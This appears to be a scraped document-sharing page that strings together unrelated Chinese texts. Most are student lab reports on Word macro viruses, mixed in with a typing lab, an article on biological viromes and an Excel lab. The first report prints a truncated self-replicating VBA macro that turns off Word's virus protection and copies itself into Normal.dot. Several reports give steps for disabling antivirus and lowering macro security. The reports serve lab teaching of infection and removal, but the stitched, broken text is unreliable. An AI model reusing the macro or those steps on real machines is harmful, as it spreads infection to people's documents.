宏病毒实验报告 2 邹文敏 一、实验目的 通过运行计算机代码,更加深刻的理解计算机代码。对计算机代码有一个初步的认识。 加深对宏病毒的感性认识,宏病毒是感染数据文件word,office 等。 二、实验内容 运行自我复制,感染word公用模板和当前文档;具有一定破坏性的宏;清除宏病毒。 三、实验步骤 实验一: 将word文档中的开发者工具打开;word 中心→信任选项→宏设计将信任选项打开
运行第一个实验Visual Basic →normal →Microsoft→the document Project→microsoft word对象→the document复制如下代码:'APMP Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False '以上都是基本的自我隐藏措施 MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines( 1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
word宏恶意代码实验
计算机宏病毒分析 一、实验目的 ?了解“宏病毒”机理; ?掌握清除宏病毒的方法; ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows 7 64位旗舰版 ?Office Word2010字处理软件。 三、实验要求 ?宏的编写; ?理解宏病毒的作用机制。 四、实验步骤: 1.软件设置 关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。 注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 2.自我复制功能演示 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word 文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 完整代码如下: 'Macro-1:Micro-Virus
GF宏病毒
西安邮电大学 通信与信息工程学院 网络攻防实验报告 专业班级: 学生姓名: 学号(班内序号): 2014 年 5 月 28 日 —————————————————————————— 装 订 线———————————————————————————————— 报告份数:
实验宏病毒 1.场景描述 在虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作。宏病毒样本:自我复制及感染病毒(copy.txt) 类台湾一号病毒(No1.txt) 备注:实验工具(D盘-->攻防工具包-->宏病毒:Copy.txt、TaiWanNo1.txt) 2.实验目的 (1)演示宏的编写 (2)说明宏的原理及其安全漏洞和缺陷 (3)理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识 3.需求分析 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。 因为Microsoft Word几乎已经成为目前全世界办公文档的事实工业标准,其影响是全球范围的。Word文件的交换是目前办公室数据交流和传送的最通常的方式之一,而且该病毒能跨越多种平台,并且针对数据文档进行破坏,因此具有极大地危害性。所以,必须要掌握如何预防和清除宏病毒,让损失减少。 4.技术分析 Word的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素: 菜单、宏、格式(如备忘录等)。模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像 和格式编排都是类似的。 Word提供了几种常见文档类型的模板,如备忘录、报告和商务信件。您可以直接使用模板来创建新文档,或者加 以修改,也可以创建自己的模板。一般情况下,Word自动将新文档基于缺省的公用模板(Normal.dot)。 可以看出,模板在建立整个文档中所起的作用,作为基类,文档继承模板的属性,包括宏、菜单、格式等。 Word处理文档需要同时进行各种不同的动作,如打开文件、关闭文件、读取数据资料以及储存和打印等等。每一 种动作其实都对应着特定的宏命令,如存文件与FileSave相对应、改名存文
实验01计算机基础知识
实验一指法练习、汉字输入与数制转换 一、实验目的 1.掌握 1)掌握键盘布局 2)初步掌握特殊键的用法 3)鼠标基本操作方法 4)一种汉字输入法 5)熟练掌握各种数制间的转换 2.熟悉 1)指法练习,向盲打过渡 2)计算机的硬件组成 二、实验要求 1.熟悉键盘布局 1)功能键区 2)主键位区(打字机键区) 3)编辑键区 4)数字键区(小键盘区) 具体要求:在清楚了4个键位区后,能够快速定位各区中的每个键位。 2.特殊键的练习 掌握这些键在Microsoft Word 2007中的用法。 3.指法练习 1)各司其职 针对十个手指 2)能者多劳 针对两个食指 3)逐渐实现盲打 请大家务必注意打字的训练,否则会影响今后的进一步学习和考试,切记!!!
除了每次实验课专门拿出一定的时间来进行打字练习外,大家也要利用课外上机的时间来提高打字的准确率和速度。 4.通过参看计算机硬件组成视频,了解和认识计算机中的主要硬件部件 5.熟练掌握各种数制间的相互转换方法 三、实验内容和步骤 1.对键盘布局的认知 结合键盘布局的图,同时对照实物,掌握键盘布局。 2.特殊键的练习 1)进入Microsoft Word 使用鼠标依次点击“开始”菜单/“程序”/“Microsoft Word”。(对 于不同的安装操作步骤可能有所不同) 2)在Word环境中,掌握下列特殊键的用法: ①主键盘区 补充:
Windows徽标键()、应用程序键()的使用方法。 ②数字键盘区 NumLock数字锁定键 ③功能键区 F1-F12功能键 Esc 取消键(由于位置关系,暂归于功能键,下同) PrtSc屏幕硬拷贝键 ④编辑键区 实现对光标(插入点)的定位,包括的键位:→、←、↑、↓、Home、End、PgUp、PgDn 实现简单编辑,包括的键位:Insert、Delete 3.指法练习 1)双击课件里“金山打字通.exe”进行安装,安装后单击桌面上的“金 山打字通”图标,进入“金山打字通”窗口。如果桌面上没有该图 标,可依次点击“开始”/“程序”/“金山打字通”进入。 2)根据个人情况,选择工具栏的相应按钮进行操练。 4.参看计算机硬件视频,了解和认识计算机中主要部件和硬件系统构成。
2020年东华大学计算机病毒课实验六宏病毒实验报告.pdf
计算机病毒实验报告 姓名: 学号: 老师: 日期:
一. 实验目的 Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 二. 实验内容 1. macro virus中的内容 2. 信安实验平台--->计算机病毒篇 ---->计算机宏病毒 3. 结合杀毒软件如诺顿、卡巴斯基等,观察病毒查杀现象 三. 实验环境 1. macro virus 硬件设备:局域网,终端PC机。 系统软件:Windows系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问. 实验环境配置如下图所示:
受感染终端受感染 Word 文档 被感染终端 2.计算机宏病毒 硬件设备:部署 WIN2003 系统的PC 机一台 软件工具:Office word2007
四.实验步骤及截图 1.自我复制,感染word公用模板和当前文档 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具宏Visual Basic宏编辑器),在左侧的project—>Microsoft Word 对象ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒 只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
病毒与宏病毒全面解读
病毒与宏病毒全面解读 美格基因姜敬哲 病毒知多少? 提起病毒,人们想到的通常是SARS、埃博拉、艾滋、流感等这些令人不愉快的词汇。事实上,病毒不仅仅影响人的健康,它们还有更重要的使命:推动自然物种的更替与演化,驱动生物地球化学的循环(Suttle等,2005)。 世上丰度最高的类群 病毒是我们这个星球上丰度最高的生命体。它们存在于世界的任意角落:从体型硕大的蓝鲸、非洲象,到肉眼无法分辨的寄生虫、细菌、衣原体等,但凡是“活”的东西,都有专门负责“办”它的病毒。
图1 常见感染人体的病毒形状和大小 科学研究中的暗物质 据推测,地球上的病毒种类多达8700万种,其中可能感染人类的病毒就有73万种,但目前比较确认的已知病毒却只有约5000种,已知的人类病毒仅有263种(Geoghegan 等,2017;Carroll 等,2018)。由此可见,病毒是生命科学研究中实打实的“暗物质”。 图2 目前地球上已知和未知的病毒物种数量
宏病毒组 病毒和细菌不同,不同病毒基因组的差异非常大,根本没有16S rDNA这种进化保守的基因,所以无法做扩增子(Amplicon)。 2002 年,Forest Rowher课题组基于宏基因组(Metagenome)研究思路,对海水中的病毒进行了富集,高通量测序后发现大量的未知病毒(Breitbart等,2002)。自此,宏病毒组(Virome)概念应运而生(即,组成一个特定生态系统或共生系统中所有病毒的集合)。 2018 年,由包括我国高福院士在内的多位世界级病毒专家在Science杂志上联合刊文,提出“全球病毒组计划”(GVP)(Carroll等,2018),将宏病毒组研究推到了一个全新的高度。 CNS中的常客 近几年,科学家运用宏病毒组学技术对多种环境、动物、微生物、以及人类各种来源的样品进行了不少的研究,产生很多突破性成果,见刊CNS已成为常态。代表作如,美国能源部的联合基因组研究所(JGI)针对全球3042份各种来源的样品进行的病毒组分析,共获得超过125 000个DNA病毒的基因组序列,将已知病毒基因集扩大16倍(Paez-Espino等,2016)。 在病毒组领域,中国科学家在其中也扮演了重要角色。2016和2018年,Nature 杂志两次报道了我国科学家张永振团队的关于无脊椎动物和脊椎动物病毒组的研究成果。他们对388种无脊椎和低等脊椎动物样品进行了大规模的转录组测序,鉴定出1659种RNA病毒,其中绝大多数为首次发现(Shi等,2016和2018,图3)。该研究的意义在于,彻底重新构建了RNA病毒世界的系统发育树,对RNA 病毒的分类进行了全新的界定。
一个简单宏病毒的感染与清楚
宏病毒实验 1. 实验目的 (1)理解宏病毒的概念、病毒机制、传播手段以及预防措施。 (2)观察一个简单宏病毒感染计算机后的现象,并寻找清除病毒的方法。 2. 实验原理 宏(Macro)是微软公司出品的Office软件包中所包含的一项特殊功能。微软公司设计此项功能的主要目的是给用户自动执行一些重复性的工作提供方便。它利用简单的语法,把常用的动作写成宏,用户工作时就可以直接利用事先编写好的宏自动运行,以完成某项特定的任务,而不必反复重复相同的工作。微软的Word Visual Basic for Application(VBA)是宏语言的标准。宏病毒正是利用Word VBA 编写的一些宏,是一种寄存在文档或模板中的计算机病毒。一旦打开含有宏病毒的文档,其中的宏就会执行,宏病毒被激活,转移到计算机中并驻留在Normal 模板上。以后所有自动保存的文档都会感染上这种宏病毒。 预防宏病毒有以下几种基本的方法: (1)防止执行自动宏:可以通过在DOS提示符下输入指令”WinWord.exe /m DisableAutoMacro”来防止打开Word文档时执行自动宏。另外,在打开或关闭文档时按下Shift键可以使文档不执行任何自动宏。 (2)保护Normal模板:可以采取以下几种方法对Normal模板进行保护。提示保存Normal模板;设置Normal模板的只读属性;设置密码保护;设置安全级别;按照自己的习惯设置Normal模板并进行备份,当被病毒感染时,使用备份模板覆盖当前模板。 (3)使用DisableAutoMacro功能。 3. 实验环境 虚拟机下Windows server 2003 4. 实验内容 本实验拟在虚拟机下感染一个简单的宏病毒,然后观察病毒对计算机有什么影响,最后寻求清除方法。
宏病毒深入分析
宏病毒的深入分析 OFFICE给用户提供了用于创建专业而优雅的文档,表格等工具,帮助用户节省时间,并得到优雅美观的结果,在当前使用中是占有巨大优势的文字,数据处理器。它为我们的办公提供了极大的便利.OFFICE为了方便客户,提供了宏这样一个功能。宏就是能组织到一起作为一独立的命令使用的一系列命令,它能使日常工作变得更容易,一般说来,宏是一种规则或模式,或称语法替换,用于说明某一特定输入(通常是字符串)如何根据预定义的规则转换成对应的输出(通常也是字符串)。这种替换在预编译时进行,称作宏展开。通俗的来说,客户事先设置好宏,需要时就可以批量使用,而不必重复操作。然而宏也是一把双刃剑,它在让客户享受便利的同时,同时也为黑客留下了漏洞,这就是今天要分析的宏病毒。 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。word宏病毒通过.DOC文档及.DOT模板进行自我复制及传播,而计算机文档是交流最广的文件类型。多年来,人们大多重视保护自己 计算机的引导部分和可执行文件不被病毒感染,而对外来的文档文件基本是直接浏览使用,这给Word 宏病毒传播带来很多便利。特别是Intemet网络的普及.Email的大量应用更为Word 宏病毒传播铺平道路。根据国外保守的统计,宏病毒的感染率高达40%以上,即在现实生活中每发现100个病毒,其中就40多个宏病毒,而目前国际上普通病毒种类已达12000多种。 宏病毒的产生,是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘,病毒可以把特定的宏命令代码附加在指定文件上,通过文件的打开或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取控制权,达到传染目的。目前在可被宏病毒感染的文件中,以W0rd,Excel居多。Word宏病毒与Excel宏病毒的特性较为相似,因此以word宏病毒为例,说明宏病毒的作用,传染以及发作的机理和特性。一旦病毒宏侵入woId,它就会替代原有的正常的宏,如FileOpen、FileSave等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。当某项功能被调用时,相应的病毒宏就会篡夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等。宏病毒在感染一个文档时,首先要把文档转换成模板格式,然后把所有病毒宏f 包括自动宏)复制到该文档中。被转换成模板格式后的染毒文件无法转存为任何其他格式。含有自动宏的宏病毒染毒文档,当被其他计算机的woId系统打开时,便会自动感染该计算机。例如,如果病毒捕获并修改了FileOpen.那么,它将感染每一个被打开的Word文件。目前,几乎所有已知的宏病毒都沿用了相同的作用机理,即如果Word 系统在读取一个染毒文件时遭受感染.则其后所有新创建的DOC文件都会被感染。 以往病毒是以二进制的计算机机器码形式出现,而宏病毒则是以人们容易阅读的源代码宏言word Basic形式出现,所以编写和修改宏病毒比以往病毒更容易。目前,世界上的宏病毒原型己有几十种,其变种与日俱增.追究其原因还是Word
大学计算机基础实验报告1
大学计算机基础实验报告1
《大学计算机基础Ⅰ》课程 实验报告手册
(以上由学生填写) 实验教师(签字) 西南大学计算机与信息科学学院 计算机基础教育系 年月日 一、实验说明 本课程实验分为一般性实验(验证和简单设计)和综合性实验(课程设计)两部分。从第3周开始参考实验任务书(本报告中的五部分)完成每周规定的实验,并根据进度按要求认真填写本实验报告中的六、七部分,此实验报告将作为实验成绩评定的依据之一。 本课程实验从开课学期第3周开始实习,每周2学时,16周结束,共28学时。除统一安排的时间外,学生还可根据自己的实际适当安排课余时间上机。上机内容参见本报告中的“五、实验任务书”部分。 二、实验目的 通过本实验,让学生掌握计算机的基本操作和基本技能,能够学会知识的运用与积累,能够
举一反三,具备一定的独立解决问题的能力和信心,培养学生熟练地使用常用软件的能力及严肃认真的科学作风,为今后的学习和工作打下良好的基础。 三、实验要求 1、每次实验课将考勤,并作为实验成绩的重要依据。 2、每次实验前学生必须充分准备每次的实验内容,以保证每次上机实验的效果。实验过程中必须独立完成。 3、学期结束时,每位同学应将自己的《实验报告》交各专业班长或学习委员,由班长或学习委员以专业为单位、按学号从小到大排列好统一交给实验指导老师,否则无实验成绩。 四、实验报告要求 一共要求填写3个阶段性实验报告、1个综合性实验报告和1份学期总结,与每份实验报告对应产生的电子文档交由实验老师指定的位置,该电子文档也将作为实验成绩评定的依据之一。 五、实验任务书 教材:《大学计算机基础》第五版高等教育出版社 实验参考书:《大学计算机基础实践教程》高等教育出版社 实验一:指法练习、汉字录入 实验目的:
计算机病毒实验
计算机病毒实验报告
一、实验目的 (1)掌握常见几种病毒的基本原理 (2)掌握清除病毒的方法 (3)学会使用几种常见病毒进行基本编程的技术 二、实验内容 分别用PE病毒,欢乐时光脚本病毒,梅丽莎宏病毒,台湾宏病毒,万花谷脚本病毒,网络炸弹脚本病毒进行感染和病毒清除实验。 三、实验环境 信息安全综合实验系统 操作系统:WINDOWS2000 JDK版本:Java Standard Edition 1.4.0以上 数据库:Mysql 开发语言:JSP Web服务器:Tomacat Office版本:MS office2000/2003 四、实验结果 1、网络炸弹 (1)实验原理 网页恶意代码确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,使非常多的用户遭受损失。 “网络炸弹”是一种网页恶意代码,可以无限次得弹出固定窗口来达到侵占客户机系统资源,最终导致客户端死机的结果。 (2)结果演示 1、修改IE的安全级别
2、修改注册表的安全设置 图2 修改IE安全设置
3、网络炸弹感染 图3 网络炸弹感染4、网络炸弹源码 图4 网络炸弹源码
2、万花谷脚本病毒 (1)实验原理 JS.On888 脚本病毒(俗称“万花谷”病毒)实际上是一个含有恶意脚本代码的网页文件,其脚本代码具有恶意破坏能力,但并不含有传播性。实验病毒为模仿它所写成的类“万花谷”病毒,减轻了病毒危害。 (2)结果演示 1、修改IE的安全级别 2、万花谷病毒感染 图5 万花谷病毒感染-1
大学计算机基础实验七数据的格式化处理
实验七数据的格式化处理 1.实验目的和要求 ?掌握Excel的选项卡,以及相关命令和快捷键的使用方法; ?熟练掌握工作表中数据的录入和导入方法,以及数据表的建立原则; ?熟练掌握序列数据的输入 ?熟练掌握工作表的管理操作; ?熟练掌握数据的操作方法,包括查找替换,复制粘贴等等; ?熟练掌握工作表中数据表的格式化操作; ?掌握简单公式的输入和应用。 2.实验环境 ?Office办公组件中的Excel电子表格软件。要求:版本最好是2007之后,机房开机应选择Win7;作业说明也基于2007以后版本。不建议使用WPS表格、LibreOffice、iWork等软件编辑,以免作业检查程序处理时出现误判。?导入数据所需的“数据源.txt”文件,可在实验要求邮件附件中找到。?《大学计算机基础》课程所有的课件、实验要求和相关软件,可在链接: https://www.360docs.net/doc/7810174850.html,/s/1qXR1XAs处下载,提取密码: k5ta。 3.实验内容 3.1.熟悉Excel选项卡并掌握相关快捷键 依次查看“开始”、“插入”、“页面布局”、“公式”、“数据”、“审阅”、“视图”选项卡,了解各个选项卡的用途以及相应功能的位置。 相关快捷键: 文档操作快捷键:新建,Ctrl + N;打开,Ctrl + O;保存,Ctrl + S;关闭,Ctrl + W。 文档内容操作快捷键:撤消,Ctrl + Z;重复,Ctrl + Y;剪切,Ctrl + X;复制,Ctrl + C;粘贴,Ctrl + V;删除,Delete。 3.2.认识功能区及相关设置操作
1)显示或隐蔽功能区 右击功能区→勾选 “功能区最小化/折叠功 能区”,可显示/隐藏功能 区。 2)添加或删除工具按钮 右击功能区→“自定义快速访问工具栏”,下拉“从下列位置选择命令”列表,选择“不在功能区中的命令”,可将其添加到左上角的快速访问工具栏(即“撤消”按钮的位置);或者右击功能区→“自定义功能区”,将新命令添加到已有或新的选项卡之中。 3.3.创建工作簿并导入数据 一个Excel的工作簿(Workbook)最多可有255张工作表(Worksheet),而每张工作表则可以存放16,384 x 1,048,576个单元格的数据。 通常可以采用复制粘贴的方法,输入外部数据,但数据不一定可以正确的匹配单元格,可能需要进行后期调整;也可以通过“导入”的方法获取外部数据,外部数据的类型也可以是多种多样的,可是Access数据库,也可以是文本文件(很多生物医学数据库网站提供的生物医学数据多采用该格式)等等。在导入数据的时候,应注意各个数据之间的间隔符号,是否存在标题,以及相对应的格式转换,如身份证数据在导入时便应设置为文本型的数据。 作业部分: 1)在Excel中新建一个空白工作簿,导入邮件附件“数据源.txt”中的全部数据 到该工作簿的“sheet1”工作表,并以A1为起始位置。 注意:应先下载保存“数据源.txt”到自己的计算机之上。 导入方法:点击“数据”→“自文本”的方式导入数据。注意,数据包含有标题,“出生日期”数据导入的格式为日期型,类型为年月日。 2)然后,将“sheet1”工作表重命名为“数据源”,以作为后续数据分析的基 础。并设置整个工作表的基本格式为:宋体,字号12。 3)如该工作簿中还存在“数据源”之外的其他工作表,如“sheet2”、“sheet3”, 则删除这些多余的工作表。